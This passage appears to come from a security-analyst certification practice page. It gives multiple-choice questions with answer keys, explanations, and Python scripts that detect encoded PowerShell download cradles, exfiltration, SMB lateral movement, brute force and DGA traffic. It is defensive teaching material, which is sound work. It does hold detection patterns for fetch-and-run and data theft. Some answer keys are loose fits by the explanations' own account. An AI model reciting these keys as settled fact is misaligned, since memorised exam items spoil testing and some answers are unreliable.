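    """-EncodedCommand is base64 over UTF-16LE text; return None if it is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_powershell_alert(cmdline, parent_image):
    payload = extract_encoded_payload(cmdline)
    decoded = decode_encoded_command(payload) if payload else None
    text = decoded if decoded is not None else cmdline
    indicators = [name for name, rx in CRADLE_PATTERNS.items() if rx.search(text)]
    parent = parent_image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    notes = []
    if parent == "svchost.exe":
        notes.append("svchost.exe parent: legitimate only via the Task Scheduler service, "
                     "so pull the scheduled task that launched this")
    if "download" in indicators and "in-memory execution" in indicators:
        verdict = "true positive: encoded download cradle (LOLBin abuse)"
    elif decoded is not None:
        verdict = "review: encoded command without cradle markers"
    else:
        verdict = "review: command not encoded"
    return {"decoded": decoded, "indicators": indicators,
            "urls": CRADLE_PATTERNS["url"].findall(text),
            "parent": parent, "verdict": verdict, "notes": notes}


if __name__ == "__main__":
    result = triage_powershell_alert(ALERT_CMDLINE, r"C:\Windows\System32\svchost.exe")
    for key, value in result.items():
        print(f"{key}: {value}")
```

The decoded text, not the encoding, drives the verdict: an administrator's encoded script with no fetch-and-run markers lands in the review bucket, while this one is a true positive on content alone, and the parent note points the analyst at the scheduled task that would explain an svchost.exe parent.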

48
Multi-Selecteasy

A SOC team is evaluating cloud-native security monitoring tools. Which TWO of the following are AWS services specifically designed for threat detection and security monitoring?

Select 2 answers
A.AWS Lambda
B.AWS CloudTrail
C.AWS GuardDuty
D.AWS Security Hub
E.AWS VPC Flow Logs
AnswersC, D

GuardDuty continuously monitors for malicious activity.

Why this answer

AWS GuardDuty is a threat detection service, and Security Hub aggregates and prioritises security findings from GuardDuty and other sources. CloudTrail and VPC Flow Logs are data sources rather than detection services (GuardDuty consumes both), and Lambda is general-purpose compute.

49
MCQmedium

An analyst is reviewing NetFlow data and notices a large amount of data being transferred from an internal database server to an external IP address on port 443 during non-business hours. The database server is not expected to initiate outbound connections. Which type of activity is most likely occurring?

A.Domain generation algorithm (DGA)
B.Lateral movement
C.Data exfiltration
D.Normal backup activity
AnswerC

The characteristics match data being stolen.

Why this answer

The data transfer is large, to an external IP, over port 443 (normally TLS, so the content is hidden from inspection), outside business hours, and from a server that should never initiate outbound connections. Together these strongly suggest data exfiltration; a backup would go to a known internal or sanctioned destination, and lateral movement would target internal hosts.
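Those four conditions translate directly into a flow-level rule. As an added example (not code from the page), the following Python script aggregates constructed NetFlow-style records per source, destination and port, then reports external transfers above a byte threshold, rating them high when the source is a host that policy says never initiates outbound traffic and medium when they merely fall outside business hours. The address plan, the no-egress server list, the business-hours window and the threshold are assumptions for the sample.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime

INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # assumed address plan
NO_EGRESS_SERVERS = {"10.20.5.11"}                     # database tier: assumed never to initiate outbound
BUSINESS_HOURS = range(8, 18)                          # 08:00-17:59 local time, assumed
BYTES_THRESHOLD = 50 * 1024 * 1024                     # 50 MiB per (src, dst, port) in the window

# Constructed flow records (not from the page): start,src,dst,dst_port,bytes
# The database server sends two large flows to an external host at 02:xx; its 900 MiB
# transfer to 10.20.5.50 is internal replication; the workstation flows are small.
SAMPLE_FLOWS = """\
2024-05-02T02:10:00,10.20.5.11,203.0.113.77,443,41943040
2024-05-02T02:25:00,10.20.5.11,203.0.113.77,443,62914560
2024-05-02T03:00:00,10.20.5.11,10.20.5.50,5432,943718400
2024-05-02T09:15:00,10.1.1.23,93.184.216.34,443,2048000
2024-05-02T11:00:00,10.1.1.40,203.0.113.77,443,1200
"""


def is_internal(ip):
    return any(ipaddress.ip_address(ip) in net for net in INTERNAL_NETS)


def find_exfiltration(flow_text, threshold=BYTES_THRESHOLD):
    """Aggregate flows per (src, dst, port) and flag large external transfers."""
    agg = defaultdict(lambda: {"bytes": 0, "flows": 0, "off_hours_flows": 0,
                               "first": None, "last": None})
    for line in flow_text.splitlines():
        if not line.strip():
            continue
        start, src, dst, port, nbytes = line.split(",")
        ts = datetime.fromisoformat(start)
        a = agg[(src, dst, int(port))]
        a["bytes"] += int(nbytes)
        a["flows"] += 1
        a["off_hours_flows"] += ts.hour not in BUSINESS_HOURS
        a["first"] = ts if a["first"] is None or ts < a["first"] else a["first"]
        a["last"] = ts if a["last"] is None or ts > a["last"] else a["last"]

    findings = []
    for (src, dst, port), a in agg.items():
        if is_internal(dst) or a["bytes"] < threshold:
            continue  # internal replication/backups and small transfers are out of scope here
        off_hours = a["off_hours_flows"] == a["flows"]
        if src in NO_EGRESS_SERVERS:
            severity = "high"      # policy violation regardless of time of day
        elif off_hours:
            severity = "medium"    # large and off-hours, but from a host allowed to egress
        else:
            continue
        findings.append({"src": src, "dst": dst, "port": port, "bytes": a["bytes"],
                         "flows": a["flows"], "off_hours": off_hours, "severity": severity,
                         "first": a["first"].isoformat(), "last": a["last"].isoformat()})
    return sorted(findings, key=lambda f: -f["bytes"])


if __name__ == "__main__":
    for finding in find_exfiltration(SAMPLE_FLOWS):
        print(finding)
```

The no-egress list is the part worth maintaining: for servers with a known traffic profile, any outbound flow to the internet is reportable on its own, and the byte threshold only decides how loudly.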

50
Multi-Selectmedium

An analyst is creating a detection rule for lateral movement using SMB. Which two network indicators should be included in the rule? (Choose two.)

Select 2 answers
A.Repeated failed logins to multiple hosts
B.High volume of DNS queries
C.SMB traffic between workstations
D.SMB traffic to administrative shares (e.g., IPC$)
E.Unusual outbound connections on port 443
AnswersC, D

Workstations rarely have a reason to talk SMB to each other, and ordinary users never touch administrative shares, so both patterns stand out.

Why this answer

Lateral movement over SMB typically means copying a tool or service binary to ADMIN$ or C$ and then driving it through named pipes on IPC$ (the service control pipe svcctl is how PsExec-style tools start their service). Workstation-to-workstation SMB sessions and administrative share access are therefore the two indicators to encode. Failed logins (A) belong in a brute-force rule, DNS volume (B) points at tunnelling or DGA activity, and outbound 443 (E) is a command-and-control or exfiltration indicator, not lateral movement.
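As an added example (not code from the page), the following Python script implements those two indicators over a constructed SMB session log: it scores each source host on workstation-to-workstation sessions, fan-out to distinct targets, administrative share use, executables dropped on an admin share, and service-control pipe access over IPC$. The workstation subnet, the addresses, share names and file names are assumptions; the admin share names and the svcctl pipe are the real Windows ones.

```python
import ipaddress
from collections import defaultdict

WORKSTATION_NETS = [ipaddress.ip_network("10.1.0.0/16")]   # assumed: user endpoints live here
ADMIN_SHARES = {"ADMIN$", "C$", "IPC$"}
SERVICE_PIPES = {"svcctl", "atsvc", "winreg"}               # remote service/task/registry control pipes

# Constructed SMB session log (not from the page): time src dst share object
# 10.1.1.23 drops PSEXESVC.exe on two peers' ADMIN$ and opens svcctl on each, then reads a
# third peer's C$. 10.5.0.20 is a management server pushing an installer to a workstation.
SAMPLE_SMB = """\
08:01:10 10.1.1.23 10.5.0.10 HOME budget.xlsx
08:02:00 10.1.1.23 10.1.1.30 ADMIN$ PSEXESVC.exe
08:02:01 10.1.1.23 10.1.1.30 IPC$ svcctl
08:02:40 10.1.1.23 10.1.1.31 ADMIN$ PSEXESVC.exe
08:02:41 10.1.1.23 10.1.1.31 IPC$ svcctl
08:03:05 10.1.1.23 10.1.1.32 C$ -
08:15:00 10.1.1.40 10.5.0.10 SHARED report.docx
08:16:00 10.5.0.20 10.1.1.50 ADMIN$ agent.msi
"""


def is_workstation(ip):
    return any(ipaddress.ip_address(ip) in net for net in WORKSTATION_NETS)


def detect_smb_lateral_movement(log_text, min_targets=2):
    """Per source host: collect the lateral-movement indicators and decide whether to alert."""
    per_src = defaultdict(lambda: {"targets": set(), "ws_to_ws": 0, "admin_shares": set(),
                                   "service_control": 0, "exe_writes": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, src, dst, share, obj = line.split()
        s = per_src[src]
        if is_workstation(src) and is_workstation(dst):
            s["ws_to_ws"] += 1
            s["targets"].add(dst)
        share = share.upper()
        if share in ADMIN_SHARES:
            s["admin_shares"].add(share)
            if share == "IPC$" and obj.lower() in SERVICE_PIPES:
                s["service_control"] += 1
            if obj.lower().endswith(".exe"):
                s["exe_writes"] += 1

    results = []
    for src, s in per_src.items():
        indicators = []
        if s["ws_to_ws"]:
            indicators.append("workstation-to-workstation SMB")
        if s["admin_shares"]:
            indicators.append("administrative share access: " + ",".join(sorted(s["admin_shares"])))
        if s["exe_writes"]:
            indicators.append("executable written to admin share (PsExec-style service binary)")
        if s["service_control"]:
            indicators.append("service control pipe over IPC$")
        # Alert only on workstation sources: servers pushing to ADMIN$ is routine management.
        alert = s["ws_to_ws"] > 0 and (len(s["targets"]) >= min_targets or bool(s["admin_shares"]))
        results.append({"src": src, "distinct_targets": len(s["targets"]),
                        "indicators": indicators, "alert": alert})
    return results


if __name__ == "__main__":
    for r in detect_smb_lateral_movement(SAMPLE_SMB):
        print(r)
```

Restricting the alert to workstation sources is what keeps this rule quiet: software deployment, EDR and backup servers legitimately write to ADMIN$ on every endpoint, and an allow-list of those servers would be the next tuning step.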

51
MCQmedium

During a vulnerability scan of internal hosts, a security analyst finds a critical vulnerability with a CVSS score of 9.8. The affected system is a legacy application that cannot be patched immediately. What should the analyst do next?

A.Increase scan frequency to monitor the vulnerability
B.Mark the vulnerability as a false positive
C.Immediately shut down the system
D.Apply compensating controls and document the risk
AnswerD

Compensating controls reduce risk while awaiting a permanent fix.

Why this answer

The analyst should document the finding and apply compensating controls, such as network segmentation or firewall rules, to mitigate risk until a patch can be applied.

52
MCQhard

A YARA rule is created to detect a specific malware family. The rule uses the string "MZ" at offset 0 and the string "malware" somewhere in the file. The analyst finds that many legitimate executables trigger the rule. What is the most effective way to reduce false positives?

A.Add a condition to check for a specific file size range.
B.Increase the rule's priority to avoid scanning all files.
C.Use the "pe" module to check for a specific section name.
D.Remove the "MZ" condition since all PE files have it.
AnswerA

Correct. Adding constraints like size or entry point reduces false positives.

Why this answer

Every PE file begins with "MZ", and the string "malware" appears in plenty of benign binaries (security products, error messages, documentation strings), so the rule as written matches nothing specific to the family. Adding constraints observed in the samples, such as a file size range, an entry-point signature or further family-specific strings, narrows the rule to that family. Dropping "MZ" (D) only widens it, and YARA has no notion of rule priority (B). The pe module (C) is also a legitimate way to tighten a rule, but only when the section name is genuinely unique to the family; a common name such as .text adds nothing.

53
Multi-Selectmedium

An analyst is tuning a SIEM rule that triggers on failed logins. Which TWO modifications would most effectively reduce false positives without missing actual brute-force attacks? (Select TWO.)

Select 2 answers
A.Remove the rule entirely because failed logins are common.
B.Add a condition that the source IP is external to the network.
C.Exclude failed logins from known administrative accounts.
D.Increase the threshold to require at least 10 failed login attempts within 5 minutes.
E.Limit the rule to logins from remote IP addresses.
AnswersD, E

Correct. A threshold separates occasional typos from sustained attempts, and a remote-source condition removes console failures.

Why this answer

Limiting the rule to remote logons removes local console failures (a user mistyping a password at the keyboard), and requiring at least 10 failures within 5 minutes ensures only sustained attempts alert. Options B and E describe nearly the same change; of the two, E is the safer one, because restricting to external source IPs (B) would hide brute force launched from a compromised internal host. Excluding administrative accounts (C) blinds the rule to exactly the accounts attackers target, and removing it (A) loses the detection entirely.
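To make the trade-off concrete, here is an added example (not code from the page) that runs three versions of the rule over a constructed authentication log: the naive rule that fires on every failure, the tuned rule (10 failures in a 5-minute sliding window, remote sources only), and an over-tuned variant restricted to external addresses that misses an internal brute-force source. The user names, addresses, timings and the internal range are assumptions for the sample.

```python
import ipaddress
from collections import defaultdict, deque
from datetime import datetime, timedelta

INTERNAL = ipaddress.ip_network("10.0.0.0/8")   # assumed corporate range
CONSOLE_SOURCES = {"-", "127.0.0.1", "::1"}     # local logons carry no network source


def make_events():
    """Constructed auth log (not from the page): (time, user, source, result) tuples."""
    t0 = datetime(2024, 5, 3, 9, 0, 0)
    events = []
    for i in range(12):   # external brute force against 'admin', one attempt every 5 s
        events.append((t0 + timedelta(seconds=5 * i), "admin", "203.0.113.9", "FAIL"))
    for i in range(3):    # alice mistypes her password three times, then succeeds
        events.append((t0 + timedelta(minutes=10, seconds=20 * i), "alice", "10.1.1.23", "FAIL"))
    events.append((t0 + timedelta(minutes=11), "alice", "10.1.1.23", "OK"))
    for i in range(11):   # compromised internal workstation brute-forcing a service account
        events.append((t0 + timedelta(minutes=30, seconds=10 * i), "svc-backup", "10.1.1.77", "FAIL"))
    for i in range(2):    # console logon failures with no network source
        events.append((t0 + timedelta(minutes=40, seconds=30 * i), "bob", "-", "FAIL"))
    return sorted(events)


def naive_alert_count(events):
    """The untuned rule: one alert per failed login."""
    return sum(1 for _ts, _user, _src, result in events if result == "FAIL")


def brute_force_alerts(events, threshold=10, window=timedelta(minutes=5),
                       remote_only=False, external_only=False):
    """Sliding-window rule: alert once per source when it reaches `threshold` failures
    inside `window`. The two filters reproduce options E and B from the question."""
    alerted = {}
    recent = defaultdict(deque)
    for ts, user, src, result in events:
        if result != "FAIL":
            continue
        if remote_only and src in CONSOLE_SOURCES:
            continue
        if external_only:
            try:
                if ipaddress.ip_address(src) in INTERNAL:
                    continue
            except ValueError:
                continue
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted[src] = {"src": src, "user": user, "failures": len(q),
                            "first": q[0].isoformat(), "last": ts.isoformat()}
    return alerted


if __name__ == "__main__":
    ev = make_events()
    print("naive rule alerts:", naive_alert_count(ev))
    print("tuned (>=10 in 5 min, remote only):", sorted(brute_force_alerts(ev, remote_only=True)))
    print("over-tuned (external only):", sorted(brute_force_alerts(ev, remote_only=True, external_only=True)))
```

The naive rule produces 28 alerts for this log; the tuned rule produces two, one per real attacker, and drops alice's typos and bob's console failures; adding the external-only condition drops to one and silently loses the internal attacker, which is the reason to prefer a threshold plus remote-source filter over an external-IP filter.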

54
MCQeasy

A SIEM alert is generated for a user who logged into a workstation at 2:00 AM, which is outside their normal working hours. The user's manager confirms the user was on call and had legitimate reason to log in. How should the analyst classify this alert?

A.False positive
B.False negative
C.True positive
D.True negative
AnswerA

Correct. The alert is triggered on benign activity.

Why this answer

The alert is a false positive because the activity is legitimate despite being outside normal hours.

55
MCQeasy

Which log source would best help detect an attacker using a domain generation algorithm (DGA) to communicate with a command and control server?

A.Firewall logs
B.Cloud audit logs
C.DNS query logs
D.Authentication logs
AnswerC

DNS logs contain the domains being queried, enabling detection of DGA patterns.

Why this answer

A DGA generates large numbers of random-looking domain names, most of which do not exist. DNS query logs therefore show the pattern directly: a high rate of NXDOMAIN responses from one client, many distinct never-seen domains, and labels with no resemblance to words. The few generated domains that do resolve are the live C2 domains and the ones to block.
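As an added example (not code from the page), the following Python script applies those three signals to a constructed DNS log with response codes: per client it counts NXDOMAIN responses and distinct domains, applies a crude lexical test for algorithmic-looking labels, and reports any generated domain that did resolve as a probable live C2. The client addresses, the domain names and the thresholds are assumptions for the sample; the lexical test is intentionally simple and would be replaced by a trained classifier or n-gram model in production.

```python
from collections import defaultdict

VOWELS = set("aeiou")

# Constructed DNS log with response codes (not from the page): time client qname rcode
# 10.1.1.55 queries seven random-looking domains, one of which resolves; 10.1.1.23 is
# a normal client with a single typo.
SAMPLE_DNS = """\
09:00:01 10.1.1.55 xkqjwpzvbtrl.com NXDOMAIN
09:00:02 10.1.1.55 mgzhtpfdqwnx.net NXDOMAIN
09:00:03 10.1.1.55 rvplknsdhzqf.org NXDOMAIN
09:00:04 10.1.1.55 bcdfghtjkmnp.info NXDOMAIN
09:00:05 10.1.1.55 wtzqxvrlpkjn.com NXDOMAIN
09:00:06 10.1.1.55 lmnpqrstvwxz.biz NXDOMAIN
09:00:07 10.1.1.55 qzxcvbnmlkjh.com NOERROR
09:00:08 10.1.1.23 www.example.com NOERROR
09:00:09 10.1.1.23 typo-exampel.com NXDOMAIN
09:00:10 10.1.1.23 mail.example.com NOERROR
"""


def registered_domain(qname):
    """Last two labels; a production rule would use the public suffix list instead."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def looks_algorithmic(label):
    """Crude lexical test: real words carry vowels and short consonant runs."""
    letters = [c for c in label.lower() if c.isalpha()]
    if len(letters) < 6:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    run = longest = 0
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    return vowel_ratio < 0.2 or longest >= 5


def find_dga_clients(log_text, min_queries=5, min_nx_ratio=0.5, min_algo_ratio=0.6):
    """Flag clients whose DNS traffic is dominated by failed lookups of random-looking domains."""
    per_client = defaultdict(lambda: {"queries": 0, "nxdomain": 0, "domains": set(),
                                      "algorithmic": 0, "resolved_suspects": []})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qname, rcode = line.split()
        domain = registered_domain(qname)
        s = per_client[client]
        s["queries"] += 1
        s["domains"].add(domain)
        algo = looks_algorithmic(domain.split(".")[0])
        s["algorithmic"] += algo
        if rcode == "NXDOMAIN":
            s["nxdomain"] += 1
        elif algo:
            s["resolved_suspects"].append(domain)   # a generated domain that answered: live C2

    findings = []
    for client, s in per_client.items():
        if s["queries"] < min_queries:
            continue
        nx_ratio = s["nxdomain"] / s["queries"]
        algo_ratio = s["algorithmic"] / s["queries"]
        if nx_ratio >= min_nx_ratio and algo_ratio >= min_algo_ratio:
            findings.append({"client": client, "queries": s["queries"], "nxdomain": s["nxdomain"],
                             "distinct_domains": len(s["domains"]), "nxdomain_ratio": round(nx_ratio, 2),
                             "resolved_suspects": s["resolved_suspects"]})
    return findings


if __name__ == "__main__":
    for finding in find_dga_clients(SAMPLE_DNS):
        print(finding)
```

The NXDOMAIN ratio is the robust signal; the lexical test exists to avoid flagging a client that merely hits many dead links, and the resolved-suspects list is the output an analyst acts on first.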

56
Multi-Selecthard

During an incident response, an analyst identifies suspicious registry modifications in the 'Run' key and a scheduled task that executes a script. Which three persistence mechanisms are most likely being used? (Choose three.)

Select 3 answers
A.AppInit_DLLs
B.Service
C.Scheduled task
D.WMI event subscription
E.Registry Run key
AnswersB, C, E

Services can be created to run malicious code automatically.

Why this answer

The evidence directly supports two mechanisms, the Run key (E) and the scheduled task (C). Of the remaining options, a malicious service (B) is by far the most common companion to those two, whereas AppInit_DLLs and WMI event subscriptions are rarer, so services are the most likely third mechanism to check for.

57
MCQmedium

During a threat hunting engagement, a hunter creates a hypothesis that adversaries may be using PowerShell to perform reconnaissance via Active Directory cmdlets. The hunter decides to look for events where PowerShell loaded the ActiveDirectory module. Which of the following detection techniques is most appropriate?

A.Create a SIEM correlation rule that triggers on Event ID 4104 (PowerShell Script Block Logging)
B.Perform a packet capture to analyze PowerShell network traffic
C.Deploy a YARA rule on endpoints to scan for malicious PowerShell scripts
D.Use osquery to query running PowerShell processes
AnswerA

Correct. Event ID 4104 records the content of executed script blocks, including the Import-Module and Get-AD* cmdlets the hypothesis is about.

Why this answer

PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log) captures the code that actually ran, so a correlation rule can match on 'Import-Module ActiveDirectory' or cmdlets such as Get-ADUser and Get-ADComputer; Module Logging (Event ID 4103) adds the pipeline details. The logging must be enabled by policy first. A packet capture would not see local cmdlet execution, YARA scans files rather than behaviour, and osquery shows which PowerShell processes are running but not what modules they loaded.

58
MCQhard

An analyst is reviewing logs from multiple sources and sees that a user logged into a workstation at 8:00 AM, then the same user logged into a server in a different building at 8:01 AM. The authentication logs show the same source IP for both logins. What should the analyst suspect?

A.Normal behavior for an administrator
B.A pass-the-hash attack
C.A user with superhuman speed
D.A false positive due to time synchronization issues
AnswerB

The attacker likely used harvested credentials from the workstation to authenticate to the server.

Why this answer

A person cannot move between buildings in one minute, but the stronger clue is the source IP: both logons came from the workstation, so the server logon is a network logon (Event ID 4624, logon type 3) launched from that host rather than a second interactive session. That is how pass-the-hash looks: the attacker reuses the user's NTLM hash from the workstation to authenticate to the server. Confirm by checking the authentication package (NTLM rather than Kerberos), whether the user normally reaches that server at all, and what process on the workstation opened the connection.

59
MCQmedium

A vulnerability scan of an internal web server shows a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF and is only accessible from internal IPs. Which of the following is the best next step?

A.Apply the patch immediately regardless of impact
B.Disable the server until a patch is available
C.Perform a risk assessment considering compensating controls
D.Ignore the finding because the server is internal
AnswerC

WAF and network segmentation reduce risk; a risk assessment determines the urgency.

Why this answer

The CVSS base score reflects severity in general, not exploitability in this environment. Compensating controls (WAF, network ACLs, internal-only access) may reduce the effective risk, so a risk assessment decides how urgently to patch and what to monitor in the meantime; it does not mean the patch is skipped.

60
MCQmedium

A security analyst is investigating a potential data exfiltration incident. They notice a host sending large amounts of data to an external IP address using DNS queries. Which technique is most likely being used?

A.DNS tunneling
B.DGA
C.HTTP smuggling
D.Beaconing
AnswerA

DNS tunneling uses DNS protocol to exfiltrate data.

Why this answer

DNS tunneling encodes data in DNS queries and responses, allowing exfiltration over port 53, which is often allowed through firewalls.

61
Multi-Selecthard

During a threat hunt, an analyst identifies a suspicious process that is making outbound connections to multiple IP addresses on port 443 using TLS. The analyst suspects data exfiltration. Which THREE techniques would best help confirm this hypothesis?

Select 3 answers
A.Review EDR telemetry for file reads on sensitive documents prior to the connections
B.Inspect the TLS certificate presented by the remote server
C.Perform a memory dump of the process and look for encryption keys
D.Analyse NetFlow/IPFIX data for unusual data transfer volumes
E.Check the process' command line for suspicious parameters
AnswersA, D, E

Correlating file access with the network connections is what turns a suspicion into evidence.

Why this answer

NetFlow/IPFIX data reveals the volume pattern (how much left, to where, and when), EDR file-access events show whether sensitive documents were read immediately before the connections, and the process command line often reveals the tool and its target. Inspecting the TLS certificate (B) identifies who the remote server claims to be but says nothing about what was sent, and dumping process memory for keys (C) is slow and rarely needed to establish that exfiltration occurred.

62
MCQmedium

A threat hunter is creating a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which of the following MITRE ATT&CK techniques should the hunter focus on?

A.T1547.001 - Registry Run Keys / Startup Folder
B.T1053.005 - Scheduled Task
C.T1071.001 - Web Protocols
D.T1059.001 - PowerShell
AnswerB

This technique covers persistence via scheduled tasks.

Why this answer

Scheduled tasks are a persistence technique (T1053.005) in the MITRE ATT&CK framework. The hunter should look for unusual scheduled tasks.

63
Multi-Selectmedium

A security analyst is investigating a potential data exfiltration incident. Network traffic analysis shows large outbound data transfers to an external IP address on port 443. The analyst wants to determine if the data was encrypted. Which THREE tools or techniques should the analyst use?

Select 3 answers
A.OSINT tools
B.Wireshark
C.NetFlow/IPFIX
D.tcpdump
E.Vulnerability scanner
AnswersB, C, D

Wireshark decodes the captured packets and shows whether the 443 traffic really is TLS.

Why this answer

tcpdump captures the traffic and Wireshark dissects it: a TLS ClientHello/ServerHello followed by application-data records proves the payload is encrypted, while plaintext or a non-TLS protocol on 443 would be visible immediately. NetFlow/IPFIX provides the flow-level metadata (endpoints, ports, byte counts, timing) that identifies which flows to capture, but on its own it cannot tell whether the bytes were encrypted. OSINT tools and vulnerability scanners answer different questions.

64
MCQhard

An analyst is investigating a potential memory injection attack on a Windows system. Which of the following memory analysis artifacts is most indicative of code injection?

A.A process with a memory region that is both writable and executable (RWX)
B.A process that is running from a temp directory
C.A process that has an unusually high handle count
D.A process with multiple threads in a suspended state
AnswerA

RWX memory regions are often used to host injected shellcode.

Why this answer

Legitimate code is mapped from an image file as executable but not writable, and data is writable but not executable, so a private (not file-backed) region that is both writable and executable is where injected shellcode or a manually mapped PE usually lives; memory forensics tools flag exactly these regions. The caveat is that JIT engines (the .NET runtime, browsers, Java) create RWX regions legitimately, so the finding is confirmed by what the region contains (an MZ header or recognisable shellcode) and by which process holds it.

65
MCQmedium

A security team is configuring a vulnerability scanner for external scanning of their public-facing web applications. Which scan type will provide the most accurate assessment of vulnerabilities without requiring credentials?

A.External scan
B.Agent-based scan
C.Authenticated scan
D.Internal scan
AnswerA

Correct. External scans simulate an attacker and do not require credentials.

Why this answer

An external scan assesses the attack surface from the internet perspective, typically without credentials. Agent-based and authenticated scans require credentials or internal access.

66
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address. The username used does not exist in Active Directory. The analyst checks the source IP and finds it belongs to a known vulnerability scanner. What classification should the analyst assign to this alert?

A.False negative
B.True positive
C.True negative
D.False positive
AnswerD

Correct. The alert is triggered by authorized scanning activity, so it is a false positive.

Why this answer

The alert was triggered by an authorised vulnerability scanner probing for valid usernames. This is expected behaviour, not an attack, so the alert is a false positive. Once confirmed, the scanner's IP should be excluded from the rule so it does not keep generating the same noise.

67
MCQhard

During a threat hunt, an analyst uses osquery to query endpoints for processes that have spawned from Microsoft Word but have network connections. Which of the following TTPs does this technique most likely detect?

A.Pass-the-hash attack
B.Spearphishing attachment leading to macro execution
C.Kerberoasting
D.Data exfiltration over DNS
AnswerB

Macro-enabled documents can spawn suspicious child processes.

Why this answer

Attackers often use macro-enabled documents to execute code, making Word spawn abnormal child processes like PowerShell or cmd.exe, which then connect outbound.

68
MCQmedium

During a threat hunting exercise, a hunter creates a hypothesis that a threat actor is using PowerShell to download payloads from a remote server. Which ATT&CK technique is the hunter most likely investigating?

A.T1047 - Windows Management Instrumentation
B.T1105 - Ingress Tool Transfer
C.T1071.001 - Web Protocols
D.T1059.001 - PowerShell
AnswerB

Ingress Tool Transfer describes the act of downloading tools or payloads from a remote server.

Why this answer

The activity maps to two techniques: T1059.001 (PowerShell) describes the execution method, and T1105 (Ingress Tool Transfer) describes the behaviour being hunted, bringing tools or payloads into the environment from a remote server. The hypothesis is about the download, so Ingress Tool Transfer is the primary technique; PowerShell is only the means.

69
MCQeasy

During a network traffic analysis, a security analyst notices a high volume of DNS queries to a domain that is algorithmically generated. The domain names follow a random pattern and are not resolved to known IP addresses. Which technique is most likely being used?

A.DNS tunneling
B.Beaconing
C.Domain generation algorithm (DGA)
D.HTTP smuggling
AnswerC

DGAs produce random domain names to communicate with C2 servers.

Why this answer

Domain Generation Algorithms (DGAs) are commonly used by malware to generate a large number of potential C2 domain names to evade static blocklists.

70
MCQhard

During a threat hunt, an analyst queries osquery to find processes where the 'cmdline' contains ' -e ' and the parent process is not 'explorer.exe'. This query is designed to detect which technique?

A.Malicious PowerShell execution
B.Lateral movement via PsExec
C.DLL injection via rundll32
D.Scheduled task creation
AnswerA

The query looks for encoded PowerShell commands (-e) spawned from non-standard parents, a common malicious pattern.

Why this answer

PowerShell's -e (short for -EncodedCommand) takes a base64-encoded command and is widely used to hide malicious one-liners; a parent other than explorer.exe means it was not launched by the user from the desktop but by a document, a script or a service. A ' -e ' substring on its own is noisy (other tools use that switch), so a production query also restricts the process name to powershell.exe or pwsh.exe.

71
MCQhard

A security analyst is investigating an alert from an endpoint EDR that shows a process with a parent-child relationship where the parent is Microsoft Word and the child process is wscript.exe executing a command to download a PowerShell script. Which MITRE ATT&CK technique does this likely represent?

A.Phishing (T1566)
B.Lateral Movement (TA0008)
C.Credential dumping (T1003)
D.Persistence (TA0003)
AnswerA

Phishing via malicious document leading to execution of a script.

Why this answer

Phishing delivers the malicious document; Word spawning wscript.exe, which in turn downloads a PowerShell script, is the classic macro-driven payload chain, and the sub-technique is T1566.001 (Spearphishing Attachment). The other options are tactics or techniques for later stages of an intrusion.

72
MCQhard

A threat hunter analyzes NetFlow data and observes a host communicating with multiple external IP addresses on high-numbered ports (e.g., 49300-49500) during off-hours. The communications are short-lived and occur in burst patterns. The hunter suspects data exfiltration. Which of the following analysis techniques would best confirm or refute this suspicion?

A.Correlate with authentication logs to see if the user is logged in
B.Check the host's registry for persistence mechanisms
C.Perform a full packet capture on the host's traffic
D.Review DNS logs for domain generation algorithm patterns
AnswerC

Correct. Packet capture reveals the actual data being transmitted.

Why this answer

Full packet capture allows inspection of the actual payloads, which NetFlow cannot provide because it only records metadata. If the traffic turns out to be TLS the content stays opaque, but the capture still establishes the protocol, the server names and certificates, and the direction and size of the transfers, which is enough to confirm or refute the exfiltration hypothesis.

73
Multi-Selectmedium

A security analyst is configuring a vulnerability scanner for an internal network. Which two settings are most important for reducing false positives during the scan? (Choose two.)

Select 2 answers
A.Disabling unnecessary plug-ins
B.Enabling credentialed scanning
C.Using a higher scan intensity
D.Scanning from multiple IP addresses
E.Scanning only during business hours
AnswersA, B

Disabling irrelevant plug-ins avoids false positives from unrelated checks.

Why this answer

Credentialed scans access system details for accurate results, and appropriate plug-in selection reduces irrelevant checks.

74
MCQhard

During a memory analysis of a compromised host, an analyst finds that 'svchost.exe' is running from 'C:\Users\Public\svchost.exe' instead of 'C:\Windows\System32\svchost.exe'. The process has injected code into a legitimate 'explorer.exe' process. What technique is being observed?

A.WMI persistence
B.DLL injection
C.Process hollowing
D.DLL side-loading
AnswerC

The attacker dropped a copy of a malicious binary named svchost.exe in a user-writable location and used it to inject code into explorer.exe.

Why this answer

Running a binary named after a system process from a user-writable location is masquerading (the genuine svchost.exe in System32 is untouched), and the code placed in explorer.exe is process injection. Strictly, process hollowing (T1055.012) means starting a legitimate process suspended and replacing its mapped image, while injecting into an already running explorer.exe is a sibling injection technique; of the options given, process hollowing is the closest match, since WMI persistence and DLL side-loading are unrelated and nothing indicates a DLL was loaded.

75
Multi-Selecteasy

A security analyst is performing a vulnerability scan on an internal network. The analyst wants to ensure the scanner can identify vulnerabilities in applications that require authentication. Which TWO scan configurations should be used?

Select 2 answers
A.Scan with default credentials
B.Non-credentialed scan
C.Agent-based scan
D.External scan
E.Credentialed scan
AnswersC, E

Agent-based scans run on endpoints and can perform authenticated checks with local privileges.

Why this answer

